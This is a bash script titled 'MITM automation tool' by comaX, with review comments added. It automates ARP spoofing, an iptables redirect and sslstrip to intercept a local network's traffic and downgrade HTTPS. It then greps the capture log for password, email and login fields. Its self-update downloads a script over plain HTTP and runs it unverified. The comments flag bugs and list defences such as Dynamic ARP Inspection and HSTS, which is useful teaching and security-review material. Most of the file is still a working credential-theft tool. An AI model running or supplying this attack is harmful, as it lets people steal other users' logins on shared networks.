- #!/bin/bash
- # Little bash script to launch a man-in-the-middle attack and sslstrip.
- # version 0.6 by comaX
# NOTE(review): the leading "- " on every line is presumably list-marker residue
# from the paste rendering rather than part of the script itself.
- PROGNAME=$(basename $0) # script name without its directory; $0 is unquoted, and PROGNAME is not referenced again in this listing
- VERSION="0.6.2" # printed by the help text and the banner; the header comment above still says 0.6
- #Let's define some arguments that can be passed to the script :
# Option parsing: walks the positional parameters one at a time. Only -h/--help
# and -u/--update are recognised; anything else prints a notice and the script
# carries on with the interactive flow below.
- args= # assigned empty and not referenced again in this listing
- while [ $# -ge 1 ] #check parameters
- do
- case $1 in
- -h | --help) #define help message
# NOTE(review): the usage line below spells the long option "--upadte", while
# the case arm further down matches "--update".
- clear
- echo -e "You are running $0, version $VERSION.
- usage : $0 [-h | --help] | [-u | --upadte]
- -h or --help : displays this help message, disclaimer and exit.
- -u or --update updates and installs this script
- \033[31m DISCLAIMER :\033[m
- This program is intended for learning purpose only. I do not condone hacking
- and wouldn't be held responsible for you actions. Only you would face legal
- consequences if you used this script for illegal activities.
- \033[31m What I think should be learnt from this script :\033[m
- This script should teach you how easy it is to steal sensitive online
- credential and how to protect you from it, provided you understand
- what this program does. The best way to understand what it does is
- to look at its source. This will also teach you very basic shell script
- programming.
- \033[31m Changelog :\033[m
- added in v0.6
- -Support for multiple targets
- added in v0.5 :
- -Parameters for this great help message and update, more comments.
- -Minor improvments
- added in v0.4 :
- -User friendly case insensitive answers (Y/y)
- -Option to map network, retrieving live hosts and their dns names
- -Minor improvments
- \033[31m Credits :\033[m
- Credits goes to all people on backtrack forums for their help and support,
- and google for being my best friend with scripting.
- Please criticize this program or submit ideas on the official thread at
- http://tiny.cc/mitmautomate or send me a mail at cyprien.bl@gmail.com"
- exit ;;
- -u | --update) #update program
# NOTE(review): self-update is a supply-chain weak point. The script is fetched
# over plain HTTP into the fixed path /tmp/mitm_update.sh, copied to
# /usr/bin/mitm and executed. Nothing checks wget's exit status or the file's
# integrity (no digest, no signature), so a failed or tampered download is
# installed and run as-is, presumably as root, since the rest of the script
# writes to /proc and calls iptables. The predictable /tmp name can also be
# pre-created or symlinked by another local user. A safer design would use
# mktemp, verify a published digest before installing, and stop on any failure.
- echo "This will download the last version from official website, and then install it to /usr/bin/mitm. Program will then exit and reload new version. In next uses you will only have to issue 'mitm' from your console. Do you wish to proceed ? (Y/N)"
- read -e proceed
- if [[ $proceed = "y" || $proceed = "Y" ]] ; then
- wget http://comax.pagesperso-orange.fr/mitm.sh -O /tmp/mitm_update.sh #download most recent version to temp file
- cp /tmp/mitm_update.sh /usr/bin/mitm #copy it to /usr/bin
- rm /tmp/mitm_update.sh #delete temp file
- echo -e "\033[32m Script updated ! Restarting to updated version...\033[m"
- sleep 3
- chmod +x /usr/bin/mitm #make newly installed script executable
# NOTE(review): there is no exit after the call below, so once the new copy
# returns, control falls through to shift and this (old) copy keeps running.
- /usr/bin/mitm #launch new script
- else echo -e "\033[31m Update aborted.\033[m Continuing with this version (you are using $0)." & sleep 2 # single & backgrounds the echo; sleep runs in the foreground
- fi ;;
- *) echo "Invalid parameters, coninuing with script $0" & sleep 2 ;; # unknown argument: notice only, no exit
- esac
- shift
- done
- clear
# Banner: prints the tool name, the project thread and the running version.
- echo -e "===========================================================================
- =\033[31m Welcome to MITM automation tool. Use this tool responsibly, and enjoy !\033[m =
- = Feel free to contribute, and distribute this script as you please. =
- = Official thread : http://tiny.cc/mitmautomate =
- = Check out the help (-h) to see new features and informations =
- = You are running version $VERSION. =
- ==========================================================================="
- echo
- echo
- # Starting fresh : reset ip forward and iptables
# NOTE(review): the four iptables calls below flush every rule and delete every
# user-defined chain in the filter and nat tables. Whatever firewall policy the
# host had before is discarded and is never restored by this script. "Cleaned."
# is printed before the commands run and regardless of whether they succeed.
- echo -e "\033[31m [+] Cleaning iptables \033[m"
- echo "[-] Cleaned."
- echo "0" > /proc/sys/net/ipv4/ip_forward # turn IPv4 forwarding off
- iptables --flush
- iptables --table nat --flush
- iptables --delete-chain
- iptables --table nat --delete-chain
- # Defining exit function and other ending features
# cleanup: stops the helper processes, turns forwarding off, resets iptables,
# greps the capture log for credential-looking form fields, then asks whether
# to keep the log and whether to install the script. Every path ends in exit.
# Reads the globals sslstripid and filename, which are only assigned further
# down in the sslstrip section.
# NOTE(review): on the "invalid choice" path cleanup runs before either global
# is set, so kill receives no PID and the log paths collapse to /tmp/.txt.
# NOTE(review): nothing in this listing installs a trap, so an interrupted run
# (Ctrl-C, closed terminal) leaves ip_forward and the nat rule in place.
- cleanup() {
- echo
- echo "[+] Killing processes and resetting iptable."
- kill ${sslstripid} # PID recorded when sslstrip was backgrounded
- killall arpspoof # every process named arpspoof, not only the ones this run started
- echo "0" > /proc/sys/net/ipv4/ip_forward #stop ipforwarding
- iptables --flush # there are probably too many resets here,
- iptables --table nat --flush # but at least we're sure everything's clean
- iptables --delete-chain
- iptables --table nat --delete-chain
- echo "[+] Clean up successful..."
- echo -e "\033[31m [+] Let's have a look at sniffed passwords... \033[m" #Displaying results
- echo -e "\033[37m (Will be blank if no passwords were found) \033[m"
# NOTE(review): the log is plain text under /tmp with a caller-chosen name and
# nothing here restricts its permissions; $filename is used unquoted and
# unvalidated in every path below, so a value containing "/" or whitespace
# changes which file is read, moved or removed.
- egrep --color -i "&pwd=|&pass=|&passwd=|&password=|&textbox=|&email=|&user=|&login=" /tmp/$filename.txt #colorize all search terms when found
- echo
- echo "Do you want to keep log file for further use or shall we delete it ? (Y=keep)"
- echo "If you want to keep it, it will be stored in /root/$filename.txt"
- read -e keep
- if [[ $keep = "Y" || $keep = "y" ]] ; then # double brackets because double condition. || signifies "or"
- mv /tmp/$filename.txt /root/$filename.txt #moving file
- if [ -f "/root/$filename.txt" ]; then #check if it exists
- echo "Log file copied !" #it does
- else echo "Error while copying log file. Go check /tmp/ for $filename.txt" #it does not
- fi
- else rm /tmp/$filename.txt #removing temp file
- echo "All logs deleted"
- fi
- if [ -f "/usr/bin/mitm" ]; then #check if script is already installed
- echo
- echo
- exit 1 #if yes, exit.
- else
- echo "This script is not installed yet. Do you wish to install it, so that you can reuse it later on by simply issuing 'mitm' in console ? (Y/N)" #if no, ask.
- read -e install
# NOTE(review): $install="y" has no spaces around "=", so [[ ]] sees one
# non-empty word and treats it as true; the install branch runs for any answer.
- if [[ $install = "Y" || $install="y" ]] ; then
- cp ./mitm.sh /usr/bin/mitm #copy and rename script; the source path is relative to the current directory
- echo -e "\033[32m Script installed !\033[m"
- else echo "Script not installed."
- fi
- fi
- exit
- }
- ###############################End of functions#############################
- # IP forwarding
# Turns on kernel IPv4 forwarding, then adds one nat PREROUTING rule that
# redirects TCP traffic arriving for port $inport to local port $outport.
# Detection note: ip_forward flipping to 1 together with a new REDIRECT rule in
# nat PREROUTING on an ordinary workstation is a host-level indicator worth
# alerting on.
- echo
- echo -e "\033[31m [+] Activating ip forwarding... \033[m"
- echo "1" > /proc/sys/net/ipv4/ip_forward
- echo "[-] Activated."
- #Iptables
- echo
- echo -e "\033[31m [+] Configuring iptables... \033[m"
- echo -en "\033[31m To \033[mwhat port should the traffic be redirected to ? (generally 10000)"
- echo
- read -e outport # local port; the sslstrip section later listens on it
- echo -en "\033[31m From \033[mwhat port should the traffic be redirected to ? (generally 80)"
- echo
- read -e inport # destination port to match
- echo -e "\033[33m Traffic from port $inport will be redirected to port $outport \033[m"
# NOTE(review): both values go to iptables unquoted and unvalidated; an empty
# or non-numeric answer makes the rule fail, yet "[-] Traffic rerouted" is
# still printed because the exit status is not checked.
- iptables -t nat -A PREROUTING -p tcp --destination-port $inport -j REDIRECT --to-port $outport
- echo "[-] Traffic rerouted"
- #Arpspoofing
# Prompts for the gateway address and interface, then starts arpspoof either
# per entered address (up to six) or against the gateway for the whole segment.
# An answer other than Y/y/N/n calls cleanup, which exits.
# Defensive context: ARP carries no authentication, which is what this step
# relies on. Dynamic ARP Inspection with DHCP snooping on the switch, a static
# ARP entry for the gateway, and monitoring for a changed gateway MAC (for
# example with arpwatch) are the usual countermeasures.
- echo
- echo -e "\033[31m [+] Activating arpspoofing... \033[m"
- echo
- ip route show | grep ^default #ip route show, minimized to line beginning with "default" : this is the one we need.
- echo
- echo "Enter gateway ip adress (as shown above) :"
- read -e gateway
- echo
- echo "What interface would you like to use ? (it should match gateway ip as shown above)"
- read -e iface
- echo
- echo "Would you like to target multiple (or single) targets or the whole network ? (Y=whole, N=single/multiple)"
- read -e choicearp
- echo
- if [[ $choicearp = "N" || $choicearp = "n" ]] ; then
- echo
- echo -e "Do you want to map network to show live hosts ? (Y/N) [This might take up to 30 secs, be patient]"
- read -e hosts
- echo -e "\033[31m "
- if [[ $hosts = "Y" || $hosts = "y" ]] ; then
# NOTE(review): the sweep assumes a /24 around the gateway address and writes
# stdout and stderr to the fixed path /tmp/hosts.txt, a predictable name that
# another local user could pre-create or symlink.
- fping -anA -q -g $gateway/24 -r 0 &> /tmp/hosts.txt #search for live hosts, displaying ip and dns name and write to file to avoid 255 lines showing up
- grep -v "ICMP" /tmp/hosts.txt # display all lines not containing "ICMP" (error lines, dead hosts)
- rm /tmp/hosts.txt # remove temporary file
- echo -e "\033[m " # switch color back to white
- else echo -e "\033[m "
- fi
- echo -e "You can select up to 6 ip adresses. Just enter them one after another when prompted.\033[31m Beware ! This will spawn as many windows as input targets and might slow down performances. If that was the case, then use whole network tageting.\033[m "
# arpspoofi: defined only when this branch runs. Starts one backgrounded xterm
# running arpspoof for $1, and one more for each of $2..$6 that passes the test
# below, then copies the six positional parameters into the globals t1..t6 for
# the status message. Inside [[ ]] the ">" operator is a string comparison, so
# [[ "$n" > "0" ]] is being used as an "argument is present" check.
- arpspoofi() {
- xterm -geometry 10x10-1-1 -T arpspoof -e arpspoof -i $iface -t $1 $gateway 2>/dev/null & sleep 2
- if [[ "$2" > "0" ]] ; then
- xterm -geometry 10x10-1-1 -T arpspoof -e arpspoof -i $iface -t $2 $gateway 2>/dev/null & sleep 2
- else echo
- fi
- if [[ "$3" > "0" ]] ; then
- xterm -geometry 10x10-1-1 -T arpspoof -e arpspoof -i $iface -t $3 $gateway 2>/dev/null & sleep 2
- else echo
- fi
- if [[ "$4" > "0" ]] ; then
- xterm -geometry 10x10-1-1 -T arpspoof -e arpspoof -i $iface -t $4 $gateway 2>/dev/null & sleep 2
- else echo
- fi
- if [[ "$5" > "0" ]] ; then
- xterm -geometry 10x10-1-1 -T arpspoof -e arpspoof -i $iface -t $5 $gateway 2>/dev/null & sleep 2
- else echo
- fi
- if [[ "$6" > "0" ]] ; then
- xterm -geometry 10x10-1-1 -T arpspoof -e arpspoof -i $iface -t $6 $gateway 2>/dev/null & sleep 2
- else echo
- fi
- t1=$1
- t2=$2
- t3=$3
- t4=$4
- t5=$5
- t6=$6
- }
- echo "Enter ip adresses"
- read -e parameters
- arpspoofi $parameters # deliberately unquoted: word splitting turns the typed line into $1..$6; input is not validated
- echo -e "\033[33m Targeting $t1 $t2 $t3 $t4 $t5 $t6 on $gateway on $iface\033[m"
- echo -e "[-] Arp spoofing is launched. \033[31m Keep new windows running. \033[m"
- elif [[ $choicearp = "Y" || $choicearp = "y" ]] ; then
- xterm -geometry 10x10-1-1 -T arpspoof -e arpspoof -i $iface $gateway & arpspoofid=$! # arpspoofid is stored but not read anywhere in this listing; cleanup uses killall instead
- sleep 2
- echo -e "\033[33m Targeting the whole network on $gateway on $iface\033[m"
- echo -e "[-] Arp spoofing is launched. \033[31m Keep new window running. \033[m"
- else echo "Your choice is invalid. Quitting."
- cleanup
- fi
- #Sslstrip
# Starts sslstrip in the background on the port chosen earlier and records its
# PID in sslstripid for cleanup. The log goes to /tmp/<filename>.txt.
# NOTE(review): $filename is caller-chosen, unquoted and unvalidated, and the
# log lives in /tmp without any permission handling in this script. The -a
# flag (per sslstrip's usage text) logs all traffic, so the file can hold far
# more than the fields cleanup greps for.
# Defensive context: the downgrade depends on the client's first request going
# out over plain HTTP. Hosts that send Strict-Transport-Security (ideally
# preloaded), with clients that honour it, are not downgraded this way.
- echo
- echo -e "\033[31m [+] Activating sslstrip... \033[m"
- echo "Choose filename to output :"
- read -e filename
- sslstrip -f -a -k -l $outport -w /tmp/$filename.txt & sslstripid=$! #output log to temp file
- sleep 2 #let time for sslstrip to launch. You may want to increase this time on slower machines
- echo
- echo -e "\033[33m Sslstrip will be listening on port $outport and outputing log in /tmp/$filename.txt\033[m"
- echo -e " [-] Sslstrip is running." # a bit redundant, but who cares ?
- echo
- echo -e "\033[37m Attack should be running smooth, enjoy.\033[m"
- echo
# Exit prompt: waits for the word "quit" and calls cleanup. After four wrong
# answers cleanup is called anyway, so every path through this block ends in
# cleanup (which exits).
# NOTE(review): $quitting is unquoted inside [ ]; an empty answer expands to
# `[ = "quit" ]`, which is a test error rather than a clean false. No signal
# trap is installed in this listing, so interrupting the script here skips
# cleanup and leaves forwarding and the nat rule active.
- echo -e "\033[33m To stop the attack, input 'quit' below :\033[m"
- echo
- read quitting
- if [ $quitting = "quit" ] ; then
- cleanup
- else echo "Bad choice. Enter quit to stop attack"
- read -e quitting
- if [ $quitting = "quit" ] ; then
- cleanup
- else echo "Bad choice. Enter quit to stop attack"
- read -e quitting
- if [ $quitting = "quit" ] ; then
- cleanup
- else echo "Bad choice. Enter quit to stop attack"
- read -e quitting
- if [ $quitting = "quit" ] ; then
- cleanup
- else echo "Bad choice. Enter quit to stop attack"
- echo
- echo -e "\033[31mNOW YOU'RE JUST BEING A FUCKING DOUCHE. QUITTING.\033[m" #I'm having fun here
- cleanup
- fi
- fi
- fi
- fi